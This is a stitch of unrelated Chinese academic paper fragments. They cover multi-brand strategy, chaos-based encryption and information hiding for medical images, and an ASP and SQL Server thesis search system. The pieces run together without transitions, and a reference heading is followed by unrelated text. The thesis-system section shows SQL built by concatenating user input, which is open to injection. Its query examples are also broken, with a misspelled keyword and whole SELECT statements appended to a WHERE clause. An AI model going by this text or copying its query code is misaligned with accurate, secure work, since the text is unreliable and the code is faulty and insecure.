(一)明確品牌定位。定位意味著犧牲,意味著有所不為,而企業的擴張又希望無所不為。企業在完成資本積累開始對外擴張的過程中,若堅持統一品牌策略,讓所有開發的新產品都套用原品牌,就會面臨兩難選擇:若進行品牌延伸,盡管極為謹慎行事,采取了防范措施,但也可能出現品牌形象淡化、每一種產品都缺乏個性而被對手各個擊破的風險;若放棄某些領域的品牌延伸,則意味著必須放棄一部分市場。要解決這一難題,一個可行的辦法就是要采取產品定位的多品牌策略。
(二)建立內在相關性。品牌管理涉及到采購、生產、營銷、財務、人力等各個環節。對多品牌企業而言,不能只關注單個品牌,而必須注意同一系列品牌之間的相互關聯和影響。內在相關性主要是指,在實施多品牌策略時必須能夠在幾個品牌之間形成良好的資源整合和共享機制。任何一個企業的資源和精力都是有限的,因此為了充分利用企業的內外資源,可以成立完善的研發、采購公共平臺,同時在渠道資源方面也實現良好的品牌互動和共享,并以完全不同的渠道策略來實現品牌間的良性競爭。品牌之間的高效整合與共享是歐萊雅取得成功的關鍵,其主要體現在技術和渠道這兩個兼容性極強的方面。在技術方面,歐萊雅盡量發揮技術平臺的相關效應。
(三)發揮企業品牌對多品牌策略的杠桿作用。多品牌策略中,品牌關系的管理還包括企業品牌和產品品牌之間關系的管理。企業品牌用于維護企業整體形象,對現有和潛在的員工來說,它是一種激勵;對投資者而言,它意味著信心;對于產品品牌,它提供的是承諾。企業品牌代表的是企業的外部形象,對產品品牌有很強的杠桿作用。歐萊雅深知企業品牌的重要性,將其營銷推廣跨越個別產品線的產品品牌宣傳,將光芒聚焦到企業品牌上來,最終形成一股激化不同產品品牌的能量。
綜上所述,企業要使用多品牌策略進行市場競爭,需要注意多方面的內容。首先在品牌定位時要注意各品牌之間的關系,使各個品牌互相不沖突,并且協調各個品牌之間的內在關系,找出重點培育的品牌,以重點品牌促進其他品牌的發展,同時又需要防止那些做得不成功的品牌影響重點品牌的價值。在培育各個品牌的同時注意隱藏成本的增加,盡量減少隱藏成本,避免因為隱藏成本拖垮了各個品牌的擴張,做到了這些才能使企業的多個品牌健康地發展,使企業在競爭中獲勝。
論文關鍵詞:多品牌;品牌定位;品牌關系
論文提要單一品牌已越來越難以滿足消費者的需求,實施多品牌策略成為眾多企業競爭市場的手段。本文分析多品牌策略的概念、優點和缺點、使用范圍、實踐應用,希望對企業的品牌決策提供幫助。
主要參考文獻:
基本思想是通過混沌系統運算出一個混沌序列,將這個序列按照事先選取的既定的算法或是排列方案進而進一步進行運算以生成新的一個序列。與此同時,為了保證原混沌序列的位置與計算后的新序列之間的變換位置是一一對應的,又進一步利用了混沌系統的遍歷性。實驗表明,這種通過由混沌系統得出的混沌序列的進而對其進一步運算得到的變化關系在應用到圖像置亂后可以實現明顯的圖像置亂效果。同時為了改變加密圖像的統計特性、圖像像素值以及降低圖像像素值間的相關性,也可以通過單個混沌序列或多個復合的混沌序列來實現改變。數字圖像信息隱藏數字圖像信息隱藏技術也可用于保護病人醫學影像的隱私。基本思想是,將需要被加密的醫學圖像的數字信息隱藏在另外一幅無關的圖像中,比如一幅公開圖像。這幅圖像要求具有一定的迷惑性、大眾性,以便迷惑攻擊者,能夠降低轉移其注意力,這樣就降低了圖像被攻擊的幾率;與此同時,通過一定算法改變加密圖像的原有的統計特性。以達到保護被加密影像的目的。應用其中的調配融合算法、“中國拼圖”算法可以使圖像的信息隱藏達到一個高質量的水平。另外,還可以綜合各種不同的算法的特點,將數字隱藏技術擴展到聲音、圖像等不同的信息載體中的信息隱藏需求中去。另外,近年來新興的一種數字作品版權保護技術——數字圖像水印技術[3],能夠有效地保護作者以及出版商的合法權益不受侵犯,現已被廣泛應用于印刷領域中,具有了廣闊的使用價值和商用價值,成為多媒體及知識產權保護的有效手段之一。數字圖像水印技術是信息隱藏技術研究領域的一個重要分支。為了顯示創作者對其作品的所有權,這種隱藏技術將具有某種意義的數字水印利用數字嵌入方法將其隱藏在其作品(可以是多種信息載體,比如視頻、圖像、聲音、文字等數字產品)中。在進行印刷品真偽驗證時,可通過水印的檢測、分析來保證數字信息的完整性及可靠性。數字圖像分存數字圖像分存技術是把一幅需要進行保護的數字圖像分割成多幅圖像進行傳輸。被分割后的圖像不再具有某種特殊的意義成為無意義或是看起來雜亂無章的圖像。也可將分割后圖像進一步隱藏到另外幾幅不相關的或是具有一定迷惑作用的圖像中進行存儲獲傳輸。這類似于數據組的分包傳輸。這樣可以避免因個別圖像的傳輸丟失而造成病人隱私信息遭到泄露的危險,而且也起到在通信中個別被分割后的圖像信息的丟失與泄露不會影響原始圖像信息的泄露。數字圖像分存技術的特點使竊密者竊取完整的原始圖像的成本大大增加,而且也提高了病人圖像隱私的保密程度同時,若將圖像置亂技術、圖像隱藏技術、圖像分存技術三者結合起來將使圖像的安全傳輸有了較高的可靠性。
對病人實行連續診斷,及時獲取病情發展狀況成為未來要實現的目標;同時,病人的隱私在圖像傳輸過程中也增加了泄露和被攻擊的風險,因此,在某種特定情況下對病人圖像信息的傳輸需要進行加密保護。實現這一目標的關鍵技術就是安全性高、保密性強、延時短的圖像加密通信系統。圖像加密通信系統對病人的病情進行實時監護,并將病人的信息實時傳回到醫生的監控中心,使醫生能夠通過監控屏幕實時查看了解病人的具體情況,以能夠及時做出正確的醫療診斷。目前數字圖像的特點決定了其在存儲傳輸時必定要占用較大的空間與帶寬,再加上其需要處理的信息量大,這就進一步給圖像的加密和通信帶來了困難。而遠程醫療更需要清楚的觀測到病人的詳細病情,就進一步加大了保密通信的難度。因此需要將圖像壓縮以及圖像加密兩個技術結合起來對數字圖像的傳輸進行處理。圖像加密是為了保證數字圖像的安全,圖像的壓縮技術可以最大限度的減小占用的存儲空間以便降低傳輸數據量。根據對原始圖像進行壓縮及加密處理過程不同,可將現有的數字圖像加密通信分為三類。圖像直接加密將數字圖像直接加密一般是通過數字圖像置亂技術直接對需要加密的數字圖像進行置亂,隨后再進行壓縮編碼和通信傳輸。這個方面的研究較早,相關論文也最多。例如,基于混沌的數據塊加密算法將圖像或視頻數據先進行位置置亂,再進行像素值擴散,此算法具有較高的密鑰敏感性和明文敏感性,使得加密后的數據具有均勻隨機分布的特點。但是,這類方案只看重了圖像的加密,沒有將圖像的壓縮編碼問題放在同樣重要的位置上考慮。這樣就隨之而然的出現了兩個嚴重影響通信效率及解密后的圖像清晰度的問題。一是,需要加密的原始視頻圖像本身的數據占用空間就大,其進一步的加密計算便會消耗大量的資源與時間,這與實時性的要求有悖,況且目前的設備處理能力有限更難以達到圖像傳輸的實時性要求,加重了通信的負擔;二是,由于經過加密算法處理,使圖像原來的相鄰像素間的相關性有了變化,大量的增加了高頻分量。使加密壓縮后的視頻圖像的高頻分量比低頻分量的失真大得多,因此解密后的圖像會有較大的失真。
首先通過現有的壓縮算法對視頻、圖像進行壓縮,之后再對壓縮后的數據加密。加密的算法可更具需要采用安全性不同的算法。此方案的優點是具有較高的安全性;缺點是由于加密是在壓縮后的數字圖像數據上進行,便不再區分數據的重要性,因此數據加密的效果差、效率低而且數據也量大,使運算的設備負擔也加重。選擇性加選擇性加密是在方案特點的基礎上改進,在選擇采用一定的壓縮標準將視頻圖像壓縮后,再對重要的數據進行著重加密。兼顧了數據的安全與傳輸的效率。目前,視頻圖像編碼標準根據靜態圖像和動態圖像來分主要分為靜態圖像的壓縮標準和運動圖像的壓縮標準兩種。動態圖像的壓縮標準主要有MPEG-1,MPEG-2,MPEG-4,H.263和H.264;靜態圖像的壓縮標準主要有JPEG、JPEG2000。文獻[4]采用小波置亂的方法來實現對JPEG2000的小波系數的實時加密。針對MPEG-2標準,文獻[5]提出了對I幀加密的思路。針對H.264具有代表性的研究成果有Ahn提出的幀內預測模式加擾方法,該方法將所有I、P幀中的INTRA-4x4塊和INTR_16×16塊預測模式使用定長偽隨機序列進行隨機加擾,方法效率高但安全性較差。文獻[6]提出了對熵編碼過程進行加密的思路,但這種方案的實現比較復雜。
作者:李穎姝 李瑩 單位:青島市第五人民醫院 青島市電子政務與信息資源管理辦公室
中圖分類號:TP392:J642.477文獻標識碼:A 文章編號:1009-3044(2007)17-31327-02
Design and Implementation of Thesis Searching System Based on B/S structure
LIU Qun-Yan,ZHANG Da-Wei
(Library Xi'an Polytechnic University ,Xi'an 710048,China)
Abstract:Based on the B/S structure, a thesis searching system is designed and developed for academic thesis searching by the ASP technique and SQL database. The system can run very stably, has complete functions and satisfies all requirements of thesis search excellently, which provides a good platform for sufficient using of academic thesis.
Key words:thesis search; ASP technology; SQL SERVER; B/S structure
1 前言
學位論文是高等院校或科研機構的學生為獲得某一級別的學位而向學校或其它學術單位提交的學術研究論文,是圍繞某一學科的重點或前沿課題進行的創造性研究和探討并加以總結的產物,所以它是具有較高學術價值的科技文獻。但很多高校多年來的博士和碩士論文因查詢不便而不能為教學和科研充分利用,所以建立基于網絡的、不受時間和空間約束的論文檢索系統已成為提高高校學位論文利用率的關鍵。而購買商業公司開發的檢索系統雖然其功能齊全、性能穩定,但不僅代價昂貴,而且其過于廣泛,不適合某一高校的學科特點和該校圖書館的具體情況。所以開發高校學位論文檢索系統非常必要,而且具有實際應用意義。本文討論了該系統的開發過程和核心難點技術。
2 系統技術分析及開發環境
本系統采用三層B/S體系結構為其基本框架,運用當前應用廣泛的動態web技術ASP實現其與數據庫的強大操作和遠程客戶端的交流。下面對這些技術和開發環境進行分析介紹。
2.1 B/S結構
B/S(Browser/Server)結構即瀏覽器/服務器結構,是把web 技術和數據庫技術結合起來的技術,其實現了開發環境和應用環境的分離,即用戶端利用相對統一的瀏覽器( IE、Netscape 等) 代替客戶端軟件,實現跨平臺的應用服務,B/S通常采用三層分布式體系結構,如圖1所示。
圖1 B/S結構
三層B/S結構的工作方式主要是用戶通過瀏覽器表單形式把客戶請求以HTTP 協議方式發送到web服務器,web服務器向數據庫服務器發送數據請求,數據庫服務器經過數據處理后將符合條件的數據返回到web服務器,web服務器把結果翻譯成HTML模式或各類Script 格式, 返回瀏覽器供用戶閱讀。
本系統采用三層B/S體系結構,用戶只要能連接到Internet網絡,就能很方便的在任何時間任何地點查詢學位論文。
2.2 ASP技術
ASP(Active Server Page) 是Microsoft 提出的基于服務器端的腳本執行環境,通過在普通HTML頁面中嵌入的ASP腳本語言(VBScript 、Jscript),就可以建立和執行動態的、交互的、高性能的Web應用程序。由于ASP腳本是在服務器端解釋執行的,所以用其設計的程序獨立于客戶端瀏覽器且保密性較高;ASP采用ADO技術訪問數據庫,ADO是一組優化的訪問數據庫專用對象集,提供了完整的站點數據庫訪問方案,使ASP訪問數據庫十分方便。基于以上原因,本系統采用ASP技術來實現其功能。
2.3 系統開發平臺和環境
本系統服務器端采用高性能、高可靠性和高安全性的Microsoft Windows 2003 Server為其操作系統,并配置IIS6.0;選取可擴充的、高效的關系型數據庫管理系統SQL SERVER 2000為后臺數據庫;采用專業網站開發編輯器Macromedia Dreamweaver MX 2004為系統開發工具;開發語言為HTML和VBScript;客戶端只需要安裝 IE4.0 或Netscape3.0 以上版本的瀏覽器即可使用本系統。
3 系統的總體結構設計
在開發此系統之前,作者做了大量的需求分析,充分了解掌握了系統所必需具有的功能,并考慮了人機功效方面的問題進行系統設計。下面對該系統的功能模塊、web頁面、數據庫作總體的設計。
3.1 功能模塊分析與設計
根據用戶對論文檢索精度要求的不同,該系統主要分為兩大模塊,(1)基本檢索模塊,(2)高級檢索模塊,如圖2所示。
圖2 系統工作流程圖
基本檢索模塊:主要適用于對檢索精確度要求不高、對論文庫按某一條件字段進行簡單分類檢索的用戶。該模塊的功能要求主要有:用戶選擇某一檢索項并輸入檢索詞,就可檢索到符合該條件的所有記錄,并將檢索結果分頁顯示;可以瀏覽某一紀錄的詳細內容,包括摘要。
高級檢索模塊:該模塊適用于對檢索結果要求精確、多條件查詢的用戶。該模塊的功能要求主要有:可以實現多個條件的與、或、非復雜查詢;將檢索結果分頁顯示;可瀏覽某一紀錄的詳細信息,包括摘要。
根據學位論文的特點和用戶的檢索需求,其檢索選擇項分為七類:論文題名、論文作者、論文導師、關鍵詞、學科專業,中文摘要、分類號。
3.2 Web頁面設計
根據該系統的模塊及功能,實現該系統需要4個頁面。檢索首頁index.asp,該頁面采用HTML表單的形式收集用戶輸入的檢索詞及檢索選擇項條件;基本檢索Bsearch.asp,該頁實現基本檢索的功能頁面,并將查詢結果分頁顯示;高級檢索Hsearch.asp,該頁實現高級檢索多選項、多條件的與、或、非查詢功能,并將查詢結果分頁顯示;記錄詳細顯示Show.asp, 該頁實現瀏覽某一紀錄的詳細信息,本校用戶可查看全文。其頁面間的關系如圖3所示。
圖3 頁面關系圖
3.3 后臺數據庫設計
本系統采用SQL SEVER 2000來創建后臺數據庫。為了提高數據庫服務器的響應速度并確保數據安全,本系統采用文件實體和文件參數分別存放的方法,即在數據庫中只保存論文的文件名、存放路徑、文件格式和大小,而在WEB服務器指定目錄存放學位論文全文。根據學位論文的構成特點和用戶的查詢需求,創建的數據庫表的字段如下:姓名、學號、專業、培養單位、論文題名、分類號、學位級別、導師姓名、導師單位、提交日期、關鍵詞、論文頁數、中文摘要、英文摘要、全文文件名,全文路徑、全文大小、全文格式。
4 系統功能實現及核心技術
在本系統的開發過程中,主要解決了三個核心技術問題。ASP與WEB數據庫的連接、多條件的與、或、非復雜查詢問題和查詢結果分頁顯示問題。下面來闡述這些問題的解決方法。
4.1 ASP與WEB數據庫的連接
ASP與數據庫的連接一般有三種方法:(1)通過ODBC DSN建立連接,(2)通過OLE DB建立連接,(3)通過Driver建立連接,本系統選用通過Driver建立連接的方法,使用該方法,程序的可移植性比較好。系統建立連接的過程如下:(1)建立數據庫連接對象:set conn = server.createobject ("adodb. connection ");(2)打開要訪問的數據庫:conn.open"Driver;Server=;Database=;Uid=;Pwd= "(3)建立記錄集對象:set rs= server. createobject("ADODB.recordset");(4)打開記錄集對象:rs. open strsql,conn,"3","1";(5)利用記錄集對象所提供的屬性對Web 數據庫實施操作;(6)關閉記錄集對象:rs.close;(7)關閉數據連接對象:conn.close;
4.2 檢索功能實現
本系統兩大檢索模塊中,基本檢索模塊中的SQL查詢比較簡單,在這里不予熬述。重點來闡述高級檢索模塊中的動態多選項、多條件的與、或、非查詢,這是開發本系統的核心技術和難點之一。本文采用VBScript中的select case語句來識別用戶的動態檢索項,用IF語句來控制多條件的查詢,專門設置變量strhigh2接受用戶所選取的與、或、非條件。SQL查詢語句用變量strsql來保存,而最初的查詢語句是:strsql= "select * from table1 where 1=1 ",后面依據條件對查詢語句進行疊加,如:strsql=strsql& "select * from table1 where name = "liuyan" ",直到條件判斷完畢,最后形成SQL查詢語句,并保存在strsql變量中,執行rs.open strsql,conn,"3","1"語句。系統查詢功能實現。
為了提高系統的簡單易用性和查詢結果的命中精度,本系統支持作者姓名、導師姓名字段的精確查詢,而對字段論文題名、關鍵詞、論文摘要、提交年份、學科專業、分類號實施模糊查詢,如:用SQL語句seletc * from table1 where name like %"& yan & "%實現模糊查詢。
4.3 查詢結果分頁顯示
在顯示查詢結果時,如果所有檢索的命中記錄在一頁顯示,將不方便用戶瀏覽,所以系統要求將查詢結果分頁顯示。而實現查詢結果分頁顯示關鍵要解決兩方面的問題:(1)循環顯示本頁記錄,(2)翻頁控制。
循環顯示本頁記錄:即當前頁記錄的顯示問題。本系統采用雙重嵌套的Do WhileLoop語句來控制當前頁記錄的顯示,用 rs.("字段名")顯示記錄字段;采用ADO中數據集RecordSet對象的一些屬性來進行參數設置:用PageSize屬性設置每頁顯示的記錄數;用PageCount 、RecordCount屬性分別顯示檢索命中的總記錄數和頁數;用AbsolutePage屬性表示當前頁碼;用MoveNext方法來移動記錄指針;并用到了BOF 屬性和EOF 屬性。通過運用以上的語句控制與屬性設置,實現了當前頁記錄的顯示。
(2)翻頁控制:系統要求將查詢結果分多頁顯示,而在進行翻頁時,涉及到對頁面bsearch.asp或hsearch.asp(實現檢索和分頁顯示的功能頁)的自身連接,也就是web服務器端要重新執行該頁面程序,重新接收用戶輸入的檢索詞和重新執行SQL查詢語句,并且要求正確顯示目標頁記錄。所以,在系統進行翻頁時,要對兩類參數進行傳遞,分別是用戶輸入的檢索詞、檢索項和當前頁數。本系統采用表單的隱藏域來對這兩類參數進行傳遞,選取Request.form("")來接收用戶從表單輸入的檢索詞和檢索項,而采用Request.querystring("")來接收翻頁時由表單隱藏域傳遞的檢索詞、檢索項參數和當前頁數參數,并用IF語句來判斷使用前者還是后者;翻頁的自身連接采用URL方式傳遞目標頁數。參數傳遞正確,系統成功實現翻頁功能。
5 結束語
采用web技術、數據庫技術、ASP技術實現了基于B/S結構的高校學位論文檢索系統。在此系統開發過程中,重點研究解決了動態多選項、多條件的與、或、非復雜查詢問題,以及檢索結果分頁顯示的問題。經過測試,本系統性能穩定、界面友好、易于使用,現已應用于西安工程大學圖書館,解決了高校學位論文的檢索難題,使得博士、碩士論文能夠被科研和教學充分利用,提高了學問論文的利用率,這也是開發本系統的真正意義所在,作者感到欣慰!
參考文獻:
[1]陳健偉,李美軍,施建強,等. ASP動態網站開發教程[M].北京:清華大學出版社,2005.188-206.
[2]張固,汪曉平.ASP網絡應用系統典型模塊開發實例解析[M].北京:人民郵電出版社,2005.53-95.
[3]龍馬工作室.ASP+SQL Server組建動態網站實例精講[M]. 北京:人民郵電出版社,2005.73-96.